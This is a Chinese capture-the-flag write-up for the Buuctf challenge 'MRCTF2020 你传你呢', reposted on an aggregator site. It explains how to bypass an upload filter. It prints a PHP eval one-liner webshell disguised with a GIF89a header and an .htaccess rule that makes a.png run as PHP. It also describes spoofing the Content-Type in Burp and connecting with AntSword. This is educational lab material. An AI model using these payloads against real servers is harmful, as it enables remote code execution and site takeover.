這名字怎么還罵人呢？
打開靶機

這個題特別坑人。我們先上傳一個圖片試試。

上傳不成功。當場給我干蒙了。正常圖片也不能傳？后來看別人的wp才知道這一題限制文件大小。
好了我們言歸正傳。思路還是上傳一句話木馬，鏈接蟻劍。先編寫一句話木馬

GIF89a <?php @eval($_POST['wz']); ?>

然后改文名件改為a.png`然后上傳。
然后你會發現無論你怎么改后綴，怎么改語法，就是無法鏈接蟻劍。說明我們的一句話木馬沒有運行。我們就得嘗試用.user.iniwen文件或者.htaccess文件把我們傳入的php代碼執行了。我們也不知道網站目錄上有沒有php文件所以我們嘗試用.htaccess文件。
詳情可見
我們創建一個名為：

.htaccess` 的文件，內容為：

<FilesMatch "a.png"> SetHandler application/x-httpd-php </FilesMatch

然后注意這里的那個a.png必須和你上傳的文件名相同。
我們上傳.htaccess。

穿不進去。我們打開bp抓包。

把這里改為image/png來繞過檢查。

成功。然后我們上傳我們的一句話木馬文件a.png。

好的，可以看到文件路徑為/upload/17f10253549cad63de6355a3b577ad74/a.png。我們打開蟻劍，添加數據。

歐克，鏈接成功添加數據，得到flag。

總結

以上是生活随笔為你收集整理的Buuctf:[MRCTF2020]你传你呢的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。